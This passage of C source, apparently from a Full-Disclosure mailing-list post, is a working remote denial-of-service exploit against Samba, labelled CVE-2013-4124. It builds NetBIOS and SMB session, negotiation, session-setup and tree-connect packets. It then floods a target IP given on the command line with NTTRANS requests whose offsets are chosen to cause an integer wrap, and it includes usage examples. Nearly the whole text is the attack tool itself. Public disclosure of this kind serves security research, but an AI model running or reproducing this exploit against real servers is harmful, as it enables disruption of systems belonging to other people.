{ if (i < len) c = toupper(plainname[i]);
else c = 0x20;
}
*ptr++ = (((c >> 4) & 0xf) + 0x41);
*ptr++ = ((c & 0xf) + 0x41);
}
*ptr = '\0';
return encoded;
}
void construct_nbt_session_header(char *ptr, uint8 type, uint8 flags, uint32
len)
{ struct nbt_session_header *nbt_hdr = (struct nbt_session_header *)ptr;
uint16 nlen;
// geen idee of dit de juiste manier is, maar 't lijkt wel te werken ..
if (len > 65535) nlen = 65535;
else nlen = htons(len);
memset((void *)nbt_hdr, '\0', sizeof (struct nbt_session_header));
nbt_hdr->type = type;
nbt_hdr->flags = flags;
memcpy(&nbt_hdr->len, &nlen, sizeof (uint16));
}
// caller zorgt voor juiste waarde van ptr.
void construct_smb_base_header(char *ptr, uint8 command, uint8 flags, uint16
flags2, uint16 tid, uint16 pid,
uint16 uid, uint16 mid)
{ struct smb_base_header *base_hdr = (struct smb_base_header *)ptr;
memset(base_hdr, '\0', sizeof (struct smb_base_header));
memcpy(base_hdr->protocol, "\xffSMB", 4);
base_hdr->command = command;
base_hdr->flags = flags;
memcpy(&base_hdr->flags2, &flags2, sizeof (uint16));
memcpy(&base_hdr->tid, &tid, sizeof (uint16));
memcpy(&base_hdr->pid, &pid, sizeof (uint16));
memcpy(&base_hdr->uid, &uid, sizeof (uint16));
memcpy(base_hdr->mid, &mid, sizeof (uint16));
}
void construct_sesssetupx_header(char *ptr)
{ struct sesssetupx_request_header *sx_hdr = (struct sesssetupx_request_header
*)ptr;
uint16 maxbufsize = 0xffff, maxmpxcount = 2, vcnumber = 31257, pwdlen = 0;
uint32 capabilities = 0x50;
memset(sx_hdr, '\0', sizeof (struct sesssetupx_request_header));
sx_hdr->wordcount = 13;
sx_hdr->command = 0xff;
memcpy(&sx_hdr->maxbufsize, &maxbufsize, sizeof (uint16));
memcpy(&sx_hdr->vcnumber, &vcnumber, sizeof (uint16));
memcpy(&sx_hdr->maxmpxcount, &maxmpxcount, sizeof (uint16));
memcpy(&sx_hdr->sessionid, &sessionid, sizeof (uint32));
memcpy(&sx_hdr->ipasswdlen, &pwdlen, sizeof (uint16));
memcpy(&sx_hdr->passwdlen, &pwdlen, sizeof (uint16));
memcpy(&sx_hdr->capabilities, &capabilities, sizeof (uint32));
}
/*
struct tconx_request_header
{ uint8 wordcount, xcommand, xreserved, xoffset[2], flags[2], passwdlen[2],
bytecount[2];
-- uint16 bytecount geeft lengte van volgende fields aan: char password[],
path[], service[];
}; */
void construct_tconx_header(char *ptr)
{ struct tconx_request_header *tx_hdr = (struct tconx_request_header *)ptr;
uint16 passwdlen = 1, bytecount;
char *data;
memset(tx_hdr, '\0', sizeof (struct tconx_request_header));
bytecount = strlen(tconx_servername) + 15;
if ((data = malloc(bytecount)) == NULL)
{ fprintf(stderr, "malloc() failed, aborting!\n");
exit(-1);
}
memcpy(data, "\x00\x5c\x5c", 3);
memcpy(data + 3, tconx_servername, strlen(tconx_servername));
memcpy(data + 3 + strlen(tconx_servername),
"\x5cIPC\x24\x00\x3f\x3f\x3f\x3f\x3f\x00", 12);
tx_hdr->wordcount = 4;
tx_hdr->xcommand = 0xff;
memcpy(&tx_hdr->passwdlen, &passwdlen, sizeof (uint16));
memcpy(&tx_hdr->bytecount, &bytecount, sizeof (uint16));
memcpy(ptr + sizeof (struct tconx_request_header), data, bytecount);
}
void nbt_session_request(int fd, char *clientname, char *servername)
{
char *cn, *sn;
char packet[sizeof (struct nbt_session_header) + (34 * 2)];
construct_nbt_session_header(packet, SMB_SESSIONREQ, 0, sizeof (packet)
- sizeof (struct nbt_session_header));
tconx_servername = servername;
sn = netbios_encode_name(servername, 0x20);
cn = netbios_encode_name(clientname, 0x00);
memcpy(packet + sizeof (struct nbt_session_header), sn, 34);
memcpy(packet + (sizeof (struct nbt_session_header) + 34), cn, 34);
write(fd, packet, sizeof (packet));
close(fd);
free(cn);
free(sn);
}
void process_nbt_session_reply(int fd)
{ struct nbt_session_header nbt_hdr;
char *errormsg;
uint8 errorcode;
int size, len = 0;
if ((size = read(fd, &nbt_hdr, sizeof (nbt_hdr))) == -1)
{ close(fd);
fprintf(stderr, "read() failed, reason: '%s' (code %i)\n", strerror(errno),
errno);
exit(-errno);
}
if (size != sizeof (nbt_hdr))
{ close(fd);
fprintf(stderr, "read() a broken packet, aborting.\n");
exit(-1);
}
memcpy(&len, &nbt_hdr.len, sizeof (uint16));
if (len)
{ read(fd, (void *)&errorcode, 1);
close(fd);
switch (errorcode)
{ case 0x80 : errormsg = "Not listening on called name"; break;
case 0x81 : errormsg = "Not listening for calling name"; break;
case 0x82 : errormsg = "Called name not present"; break;
case 0x83 : errormsg = "Called name present, but insufficient resources";
break;
case 0x8f : errormsg = "Unspecified error"; break;
default : errormsg = "Unspecified error (unknown error code received!)";
break;
}
fprintf(stderr, "session request denied, reason: '%s' (code %i)\n", errormsg,
errorcode);
exit(-1);
}
printf("session request granted\n");
}
void negprot_request(int fd)
{ struct variable_data_header data;
char dialects[] = "\x2PC NETWORK PROGRAM 1.0\x0\x2MICROSOFT NETWORKS
1.03\x0\x2MICROSOFT NETWORKS 3.0\x0\x2LANMAN1.0\x0" \
"\x2LM1.2X002\x0\x2Samba\x0\x2NT LANMAN 1.0\x0\x2NT LM 0.12\x0\x2""FLATLINE'S
KWAADWAAR";
char packet[sizeof (struct nbt_session_header) + sizeof (struct
smb_base_header) + sizeof (data) + sizeof (dialects)];
int dlen = htons(sizeof (dialects));
memset(&data, '\0', sizeof (data));
construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof
(struct nbt_session_header));
pid = getpid();
construct_smb_base_header(packet + sizeof (struct nbt_session_header),
SMB_NEGPROT, 8, 1, 0, pid, 0, 1);
memcpy(&data.bytecount, &dlen, sizeof (uint16));
memcpy(packet + (sizeof (struct nbt_session_header) + sizeof (struct
smb_base_header)), &data, sizeof (data));
memcpy(packet + (sizeof (struct nbt_session_header) + sizeof (struct
smb_base_header) + sizeof (data)),
dialects, sizeof (dialects));
if (write(fd, packet, sizeof (packet)) == -1)
{ close(fd);
fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno),
errno);
exit(-errno);
}
}
void process_negprot_reply(int fd)
{ struct nbt_session_header *nbt_hdr;
struct smb_base_header *base_hdr;
struct negprot_reply_header *np_reply_hdr;
char packet[1024];
int size;
uint16 pid_reply;
nbt_hdr = (struct nbt_session_header *)packet;
base_hdr = (struct smb_base_header *)(packet + sizeof (struct
nbt_session_header));
np_reply_hdr = (struct negprot_reply_header *)(packet + (sizeof (struct
nbt_session_header) +
sizeof (struct smb_base_header)));
if ((size = read(fd, packet, sizeof (packet))) == -1)
{ close(fd);
fprintf(stderr, "read() failed, reason: '%s' (code %i)\n", strerror(errno),
errno);
exit(-errno);
}
memcpy(&pid_reply, &base_hdr->pid, sizeof (uint16));
memcpy(&sessionid, &np_reply_hdr->sessionid, sizeof (uint32));
if (base_hdr->command != SMB_NEGPROT || np_reply_hdr->wordcount != 17 ||
pid_reply != pid)
{ close(fd);
fprintf(stderr, "protocol negotiation failed\n");
exit(-1);
}
printf("protocol negotiation complete\n");
}
void sesssetupx_request(int fd)
{ uint8 data[] = "\x12\x0\x0\x0\x55\x6e\x69\x78\x00\x53\x61\x6d\x62\x61";
char packet[sizeof (struct nbt_session_header) + sizeof (struct
smb_base_header) +
sizeof (struct sesssetupx_request_header) + sizeof (data)];
int size;
construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof
(struct nbt_session_header));
construct_smb_base_header(packet + sizeof (struct nbt_session_header),
SMB_SESSSETUPX, 8, 1, 0, pid, 0, 1);
construct_sesssetupx_header(packet + sizeof (struct nbt_session_header) +
sizeof (struct smb_base_header));
memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct
smb_base_header) +
sizeof (struct sesssetupx_request_header), &data, sizeof (data));
if ((size = write(fd, packet, sizeof (packet))) == -1)
{ close(fd);
fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno),
errno);
exit(-errno);
}
if (size != sizeof (packet))
{ close(fd);
fprintf(stderr, "couldn't write entire packet, aborting!\n");
exit(-1);
}
}
void process_sesssetupx_reply(int fd)
{ struct nbt_session_header *nbt_hdr;
struct smb_base_header *base_hdr;
struct sesssetupx_reply_header *sx_hdr;
char packet[1024];
int size, len;
if ((size = read(fd, packet, sizeof (packet))) == -1)
{ close(fd);
fprintf(stderr, "read() failed, reason: '%s' (code %i)\n", strerror(errno),
errno);
exit(-errno);
}
nbt_hdr = (struct nbt_session_header *)packet;
base_hdr = (struct smb_base_header *)(packet + sizeof (struct
nbt_session_header));
sx_hdr = (struct sesssetupx_reply_header *)(packet + sizeof (struct
nbt_session_header) + sizeof (struct smb_base_header));
memcpy(&len, &nbt_hdr->len, sizeof (uint16));
memcpy(&uid, &base_hdr->uid, sizeof (uint16));
if (sx_hdr->xcommand != 0xff && sx_hdr->wordcount != 3)
{ close(fd);
fprintf(stderr, "session setup failed\n");
exit(-1);
}
printf("session setup complete, got assigned uid %i\n", uid);
}
void tconx_request(int fd)
{
char *packet;
int size, pktsize = sizeof (struct nbt_session_header) + sizeof (struct
smb_base_header) +
sizeof (struct tconx_request_header) + strlen(tconx_servername) + 15;
if ((packet = malloc(pktsize)) == NULL)
{ close(fd);
fprintf(stderr, "malloc() failed, aborting!\n");
exit(-1);
}
construct_nbt_session_header(packet, SMB_SESSION, 0, pktsize - sizeof (struct
nbt_session_header));
construct_smb_base_header(packet + sizeof (struct nbt_session_header),
SMB_TCONX, 8, 1, 0, pid, uid, 1);
construct_tconx_header(packet + sizeof (struct nbt_session_header) + sizeof
(struct smb_base_header));
if ((size = write(fd, packet, pktsize)) == -1)
{ close(fd);
fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno),
errno);
exit(-errno);
}
free(packet);
if (size != pktsize)
{ close(fd);
fprintf(stderr, "couldn't write entire packet, aborting!\n");
exit(-1);
}
}
void process_tconx_reply(int fd)
{ struct nbt_session_header *nbt_hdr;
struct smb_base_header *base_hdr;
struct tconx_reply_header *tx_hdr;
char packet[1024];
int size, bytecount;
if ((size = read(fd, packet, sizeof (packet))) == -1)
{ close(fd);
fprintf(stderr, "read() failed, reason: '%s' (code %i)\n", strerror(errno),
errno);
exit(-errno);
}
nbt_hdr = (struct nbt_session_header *)packet;
base_hdr = (struct smb_base_header *)(packet + sizeof (struct
nbt_session_header));
tx_hdr = (struct tconx_reply_header *)(packet + sizeof (struct
nbt_session_header) + sizeof (struct smb_base_header));
memcpy(&tid, &base_hdr->tid, sizeof (uint16));
memcpy(&bytecount, &tx_hdr->bytecount, sizeof (uint16));
printf("tree connect complete, got assigned tid %i\n", tid);
}
void nttrans_request(int fd, unsigned int offset_wrap) {
// packet = nbt session header + smb base header + nttrans header!
char packet[sizeof (struct nbt_session_header) +
sizeof (struct smb_base_header) +
sizeof (struct nttrans_request_header)];
struct nttrans_request_header nttrans_hdr; // nttrans header!
int size=0;
int function = SMB_NTTRANSCREATE; // NTTRANSCREATE!
int totalparamcount = TOTALCOUNT;
int totaldatacount = 0;
uint8 setupcount = 0;
memset(&nttrans_hdr, 0, sizeof nttrans_hdr);
// construct nbt session header
construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) -
sizeof (struct nbt_session_header));
// construct smb base header
construct_smb_base_header(packet + sizeof (struct nbt_session_header),
SMB_NTTRANS, 8, 1, tid, pid, uid, 1);
// construct nttrans header
sprintf(nttrans_hdr.paramoffset, "%p", offset_wrap);
/**********
* XXX data offset 0xffffffff to 0xf1000000 to integer wrap
* the offset exploits the security bug of CVE-2013-4124
* samba remote dos!
*/
sprintf(nttrans_hdr.dataoffset, "%p", offset_wrap);
nttrans_hdr.wordcount = 19 + setupcount;
memcpy(&nttrans_hdr.function, &function, sizeof (uint16));
memcpy(&nttrans_hdr.totalparamcount, &totalparamcount, sizeof (uint32));
memcpy(&nttrans_hdr.totaldatacount, &totaldatacount, sizeof (uint32));
memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct
smb_base_header), &nttrans_hdr, sizeof nttrans_hdr);
// send samba packet!
size = write(fd, packet, sizeof (packet));
close(fd);
}
static char banner[]={
" ___ ___ \n" \
" / _ \\ / _ \\ \n" \
" __ __| (_) || | | | ___ \n" \
" \\ \\/ / \\__. || | | | / __| \n" \
" > < / / | |_| || (__ \n" \
" /_/\\_\\ /_/ \\___/ \\___| \n" \
};
int main(int argc, char *argv[]) {
int fd;
struct sockaddr_in s_in;
char target_ip[16];
char server_name[32];
int smb_port=139;
unsigned int offset_wrap=0x00000000;
printf("%s\n\nsamba nttrans reply exploit\n\n", banner);
if(argc < 2){
fprintf(stderr, "samba nttrans reply exploit
Usage:\n\n./samba_exploit [target ip addr] <server name>\n\n"
"ex) ./samba_exploit
10.0.1.16\n"
"ex) ./samba_exploit 10.0.1.16
MYSAMBA\n\n");
exit(-1);
}
strncpy(target_ip, argv[1], 16);
if(argc==3){
memset(server_name, 0, sizeof server_name);
strncpy(server_name, argv[2], sizeof(server_name)-1);
} else{
sprintf(server_name, "SAMBA");
}
printf("[*] SERVER NAME: %s\n", server_name);
memset(&s_in, 0, sizeof (s_in));
s_in.sin_family = AF_INET;
s_in.sin_port = htons(smb_port); // samba port=139/tcp
s_in.sin_addr.s_addr = inet_addr(target_ip);
fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
connect(fd, (struct sockaddr *)&s_in, sizeof (s_in));
// nbt(netbios over tcpip, nbtstat) session request
nbt_session_request(fd, "BOSSA", server_name); // adjust computer
names(clientname, servername)
process_nbt_session_reply(fd);
// protocol negotiation
negprot_request(fd);
process_negprot_reply(fd);
// session setup
sesssetupx_request(fd); // setup request
process_sesssetupx_reply(fd); // setup reply
// tree connection setup
tconx_request(fd);
process_tconx_reply(fd);
// exploit!
printf("[*] nttrans reply exploit!\n");
// 0xffffffff ~ 0xf100000000 to integer wrap
for(offset_wrap=0xffffffff; offset_wrap >= 0xf1000000; --offset_wrap){
printf("[-] offset to wrap up: %p\n", offset_wrap);
nttrans_request(fd, offset_wrap);
}
close(fd);
return 0;
}
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/